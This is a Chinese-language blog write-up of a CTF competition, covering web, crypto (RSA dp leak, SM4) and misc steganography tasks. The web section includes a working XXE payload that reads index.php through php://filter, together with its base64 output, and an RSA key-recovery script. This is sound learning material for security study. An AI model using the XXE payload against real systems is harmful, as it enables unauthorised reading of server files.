网络与信息安全领域专项赛 wp

最新推荐文章于 2024-06-11 15:14:16 发布
最新推荐文章于 2024-06-11 15:14:16 发布
阅读量947 收藏
点赞数
分类专栏: ctf学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44255856/article/details/99655671
版权

web

game

打开页面直接审查源码
在这里插入图片描述
发现这两个js文件比较可疑,于是查看。
在cqg.js文件中发现了
在这里插入图片描述
于是在http://6d03d4f7b3f24269af3d217475afd474d9f69cc849b941ce.changame.ichunqiu.com/score.php页面中直接post:score=15
即可得到flag
在这里插入图片描述

who are you

打开页面随便输入
在这里插入图片描述
先抓个包看看
在这里插入图片描述
发现存在xml.
还是审查源码,发现一段js代码。
在这里插入图片描述
通过分析这个js代码,发现可以使用在xml中使用php协议。
于是构造payload.

<?xml version="1.0" encoding="utf-8"?>   
<!DOCTYPE foo [   
<!ELEMENT foo ANY >  
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>   
<creds>
<user>&xxe;</user>
<pass>mypass</pass></creds>

在这里插入图片描述

PD9waHAKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiRkYXRhID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdwaHA6Ly9pbnB1dCcpOwokcmVzcCA9ICcnOwovLyRmbGFnPSdmbGFne2YyYWFjMzI0LTYxZGQtNDNlNC05MmFhLTkzYzk5NWNjYTI4YX0nOwppZigkZGF0YSAhPSBmYWxzZSl7CiAgICAkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CiAgICAkZG9tLT5sb2FkWE1MKCRkYXRhLCBMSUJYTUxfTk9FTlQpOwogICAgb2Jfc3RhcnQoKTsKICAgICRyZXMgID0gJGRvbS0+dGV4dENvbnRlbnQ7CiAgICAkcmVzcCA9IG9iX2dldF9jb250ZW50cygpOwogICAgb2JfZW5kX2NsZWFuKCk7CiAgICBpZiAoJHJlcyl7CiAgICAgICAgZGllKCRyZXMpOwogICAgfQoKfQo/Pgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KICAgIDx0aXRsZT53ZWxjb21lPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLi9zdHlsZS5jc3MiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJpZT1lZGdlIj4KCjwvaGVhZD4KPGJvZHkgY2xhc3M9ImNvbnRhY3RCb2R5Ij4KPGRpdiBjbGFzcz0id3JhcHBlciI+CiAgICA8ZGl2IGNsYXNzPSJ0aXRsZSI+CgoKICAgIDwvZGl2PgoKCiAgICA8Zm9ybSBtZXRob2Q9InBvc3QiIGNsYXNzPSJmb3JtIj4KICAgICAgICA8aDEgaWQ9InRpdGxlIj7or7fovpPlhaXlp5PlkI08L2gxPgogICAgICAgIDxici8+CiAgICAgICAgPGJyLz4KICAgICAgICA8YnIvPgogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBjbGFzcz0ibmFtZSBlbnRyeSAiIGlkPSJuYW1lIiBuYW1lPSJuYW1lIiBwbGFjZWhvbGRlcj0iWW91ciBOYW1lIi8+CiAgICA8L2Zvcm0+CiAgICA8YnV0dG9uIGNsYXNzPSJzdWJtaXQgZW50cnkiIG9uY2xpY2s9ImZ1bmMoKSI+U3VibWl0PC9idXR0b24+CgogICAgPGRpdiBjbGFzcz0ic2hhZG93Ij48L2Rpdj4KPC9kaXY+Cgo8L2JvZHk+CjwvaHRtbD4KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgZnVuY3Rpb24gcGxheSgpIHsKICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CiAgICBmdW5jdGlvbiBmdW5jKCkgewogICAgICAgIC8vIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCkudmFsdWUKICAgICAgICB2YXIgeG1sID0gJycgKwogICAgICAgICAgICAnPFw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ilw/PicgKwogICAgICAgICAgICAnPGZlZWRiYWNrPicgKwogICAgICAgICAgICAnPGF1dGhvcj4nICsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ25hbWUnKS52YWx1ZSsgJzwvYXV0aG9yPicgKwogICAgICAgICAgICAnPC9mZWVkYmFjaz4nOwogICAgICAgIGNvbnNvbGUubG9nKHhtbCk7CiAgICAgICAgdmFyIHhtbGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKICAgICAgICB4bWxodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uICgpIHsKICAgICAgICAgICAgaWYgKHhtbGh0dHAucmVhZHlTdGF0ZSA9PSA0KSB7CiAgICAgICAgICAgICAgICAvLyBjb25zb2xlLmxvZyh4bWxodHRwLnJlYWR5U3RhdGUpOwogICAgICAgICAgICAgICAgLy8gY29uc29sZS5sb2coeG1saHR0cC5yZXNwb25zZVRleHQpOwogICAgICAgICAgICAgICAgdmFyIHJlcyA9IHhtbGh0dHAucmVzcG9uc2VUZXh0OwogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3RpdGxlJykudGV4dENvbnRlbnQgPSByZXMKICAgICAgICAgICAgfQogICAgICAgIH07CiAgICAgICAgeG1saHR0cC5vcGVuKCJQT1NUIiwgImluZGV4LnBocCIsIHRydWUpOwogICAgICAgIHhtbGh0dHAuc2VuZCh4bWwpOwogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH07Cjwvc2NyaXB0Pgo8L2JvZHk+CjwvaHRtbD4=
mypass

得到了index.php的源码。将其base64转码发现flag
在这里插入图片描述

Crypto

dp

将内容下载下来。

e=65537
n=9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp=81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c=5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827

构造payload

import gmpy2
e=65537
n=9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp=81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c=5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827

stuff=dp*e-1
for k in range(1,e):
    if stuff%k==0:  #p should be an integer
        p1=stuff//k+1
        if n%p1==0: #p should divide n
            p=p1
q=n//p
phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
m=pow(c,d,n)
print bytearray.fromhex(hex(pow(c,d,n))[2:])

即可得到flag:flag{c3009b61-f9ed-4b20-8855-edab53e89530}

SM4

脚本

from pysm4 import encrypt, decrypt
key=[13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56, 214, 192, 194, 98, 104]
c=[46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64, 149, 240, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16, 60, 182, 65, 101, 39, 253, 250, 224, 9, 204, 154, 122, 206, 43, 97, 59]
key=''.join(map(chr,key)).encode('hex')
c=''.join(map(chr,c)).encode('hex')
print(key,c)
flag=''
for i in range(3):
 flag+=(hex(decrypt(int(c[i*32:i*32+32],16), int(key,16)))[2:-1].decode('hex'))
print(flag)

misc

签到

题目信息:I’m gamectf.com, I love TXT.
猜测是域名解析,直接使用在线网站进行查询

http://doma.pucha.net/?t=1565944886

在这里插入图片描述
24word

打开是这样的图片。
在这里插入图片描述
使用foremost将图片分离。发现存在一个zip文件。于是解压压缩包,发现需要密码
在这里插入图片描述
想到原来的24w.png图片的社会主义核心价值观,于是想到了社会主义核心价值观编码。
在这里插入图片描述
解码出来,得到密码:CodeValues
压缩包解压出来。在这里插入图片描述
将图片转为黑白,扫码即可得到flag.

亚萨西

使用winhex打开zip文件,在文件末尾发现了pass:loli
应该是压缩包的密码。
在这里插入图片描述

将压缩包解出来,得到一张图片。winhex打开
发现末尾有一大串编码
在这里插入图片描述
使用ook解码得到flag.
在这里插入图片描述
七代目

首先修复文件头。放入 stegsolve中查看帧数,在第七帧的时候发现flag.
在这里插入图片描述

「已注销」
关注
专栏目录
面向6G的星地融合标准化研究进展
罗伯特技术屋
06-18 99
【摘 要】星地融合被视为6G的标志性发展方向,ITU和3GPP等国际标准化组织或其它机构正有序推进面向6G的星地融合标准研发。对具有全球代表性的面向6G的星地融合标准化研究机构进行了简单介绍,重点分析ITU和3GPP在5G-Advanced及6G标准化过程中关于星地融合的主要研究和标准化成果。ITU在对卫星在IMT-2020网络的用例、场景、能力、系统、无线电接口,以及性能参数等方面进行了规范的同时,在IMT-2030未来技术趋势有关建议书突显了卫星的地位与作用。3GPP在冻结全球首个5G非陆地网络标准R
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6019
11.7 本人ctf小白,参加比基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
2018高校网络信息安全管理运维挑战官方WP
11-20
2018年网络安全管理运维挑战,本文档给出了详细的解题思路和技巧
网络信息安全领域专项 writeup
zhang14916的博客
08-19 1380
crypto sm4: 题目提示这是一个sm4加密的题目,给出了key和密文,于是在网上找了一个sm4加密的代码(https://blog.csdn.net/songdawww/article/details/79112548),稍加修改即可得到正确答案(将源代码主函数的ecb解密留下,将密钥和密文放入即可) key_data = [13, 204, 99, 177, 254, 41, 19...
20190815网络信息安全领域专项线上misc WriteUp
afu42832的博客
08-17 298
目录 签到题 题目内容 使用工具 解题步骤 七代目 题目下载地址 使用工具 解题步骤 亚萨西 题目下载链接 使用工具 解题步...
i春秋-网络信息安全专项部分题目write up
宗泽的博客
08-16 1021
逆向 flat 进入IDA分析,找到主函数,F5查看伪代码 里面存在好几个while循环和if判断,而且数值特别大。 再往下看,下面还会输出“what a shame!!!”,意思是好可惜啊,可以判断,如果输出这句话,就说明我们错了,所以,通过上面的条件将这句话跳过去。 可以看出来,当if(v4&1)成立时,v5会重新赋值,v16也会变,不满足下面的判断,执行“break”,从而跳过这...
【Writeup】i春秋网络安全领域专项技能_Reverse_flat
BAKUMANSEC - Just Do It
08-17 390
0x01 解题思路 尝试运行一下 拖入ida64,F5 分析代码逻辑   代码看起来复杂,但是其实很容易分析出来,只要用户输入的字符串通过了5个check函数就会输出"you got it !",从而获取flag,否则输出“what a shame !!!”。   对5个fun_check进行分析,发现前四个只是规定了flag的格式为UUID格式,即flag{xxxxxxxx...
Python算法与数据结构:回溯法解题全攻略
[Python算法与数据结构:回溯法解题全攻略](https://media.geeksforgeeks.org/wp-content/uploads/20231016112106/backtracking-banner-(1).png) # 1. 回溯法基础介绍与理论 ## 回溯法的定义与原理 回溯法是一种...
人机协作的仿生变刚度关节设计及控制
2022年8月25日收到2022年10月30日修订2022年11月14日接受2022年12月5日在线发布保留字:变刚度关节仿生设计sEMGa b st ra ct交互的物理顺应性是机器人与人之间安全高效协作的重要要求,而人-机器人顺应性的实现要求...
车牌识别系统成本效益分析:投资回报率评估,量化投资价值
它广泛应用于交通管理、执法和安全领域。LPR系统由摄像头、图像处理软件和字符识别算法组成。摄像头捕获车辆图像,图像处理软件提取车牌区域,字符识别算法识别车牌号码。 LPR系统具有以下优点: * **准确性高:**...
网络信息安全攻防平台|基础关wp
0nc3的博客
03-24 2092
解题过程多次用到burpsuite的repeater功能 涉及到http请求头 右键选择send to Repeater 就可以在Repeater中更改请求包内容,然后点击GO 获取相应响应包的数据 1.key在哪里? 右键查看源码即可 2.再加密一次你就得到key啦~ 加密后的数据再加密一次就得到了密文,这正是rot-13加密的加密方法。 3.猜猜这是经过了多少次加密 用pyth...
2024高校网络安全管理运维题目--复现+题目+wp
最新发布
书山有路勤为径,学海无涯苦作舟
06-11 765
官方writeup集思广益比较好的备份。
17上海市网络安全大wp【web】
Sp4rkW的博客
11-06 1349
Some words 脚本测试为limit 81的时候可以试出f14g,,尝试出,字段名也是f14g 继续这个爆破,脚本放下面 出flag Welcome To My Blog 通过awvs发现home.php 猜测测试出passage.php和album.php 猜测action是文件读取,尝试,flag 查看源码出 ...
Pyhon模块之pysm4
qq_51146365的博客
07-12 3427
pysm4介绍安装教程使用encrypt和decryptencrypt_ecb和decrypt_ecbencrypt_cbc和decrypt_cbc实际运用 介绍 pysm4是国密SM4算法的Python实现,能实现sm4算法的正向或者逆向过程 安装教程 一.在GitHub上下载相关文件 yang3yen/pysm4 二.将下载文件解压到任意位置 三.打开cmd,进入到指定文件夹目录下,并输入如下指令: python setup.py install #实测python3.9可以使用 如果不出意外的话
bugkuCTF平台逆向题第五道love题解
iqiqiya的博客
12-28 8414
题目链接: http://123.206.31.85/files/99278e700add95793a765b13ab1314ea/reverse_3.exe tips: 查壳无壳(截图略) 载入OD 搜索字符串 随意输入1111111111111111111 发现进行了base64加密 再向下单步 发现、 结合IDA看下 int su
2021山东省大学生网络技术大网络安全道决WP
热门推荐
Love&Share
10-24 1万+
WP来自齐鲁师范学院网络安全社团 关注公众号接收更多最新的安全讯息 题目附件: web checkin2 hacker’gift 扫目录找admin目录,访问 http://ip:20000/admin 会自动跳转到以下目录 http://ip:20000/admin/#/app/index 使用弱口令admin admin888登录 后台很多功能不能用,不用删除、上传、修改文件,但是有检测木马功能找到后门文件也就是题目提示的黑客的礼物 访问下,是一个混淆的php代码 使用蚁剑链接,密码wen,根
网络信息安全攻防学习平台脚本关第9题解题思路
Leslie_LIL的博客
03-11 552
网络信息安全攻防学习平台脚本关第9题 点开题目是: 按照提示点击获取手机验证码: 输入手机验证码: 出现与开始题目不一样的手机号码: 那么按照他的要求,回去更改手机号: 输入之前获取的手机验证码即可得到本题的flag。 ...
2021陇剑杯网络安全大wp-webshell部分(详细题解)
偷一个月亮
09-15 6719
3.1 3.2 其中web根目录可以再system命令中看到 3.3 3.4 3.5 写frpc配置文件,推测为frpc,正确 实际上传动作为 L3Zhci93d3cvaHRtbC9mcnBj解码base64即为/var/www/html/frpc 3.6 3.5中写配置动作,hex转字符后,如下 3.7 同上 ...
CTF密码学之SM4
CharlesGodX的博客
10-13 9499
介绍 SM4.0(原名SMS4.0)是中华人民共和国政府采用的一种分组密码标准,由国家密码管理局于2012年3月21日发布。相关标准为“GM/T 0002-2012《SM4分组密码算法》(原SMS4分组密码算法)”。在商用密码体系中,SM4主要用于数据加密,其算法公开,分组长度与密钥长度均为128bit,加密算法与密钥扩展算法都采用32轮非线性迭代结构,S盒为固定的8比特输入8比特输出。SM4.0...
信息系统安全与保密:关键概念与挑战
- 通常,一个完整的信息安全体系结构会包括物理安全、网络安全、主机安全、应用安全和数据安全等多个层面,旨在从多个维度保障信息系统的安全。 5. **政策法规与标准** - 强调了政策法规如《中华人民共和国计算机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值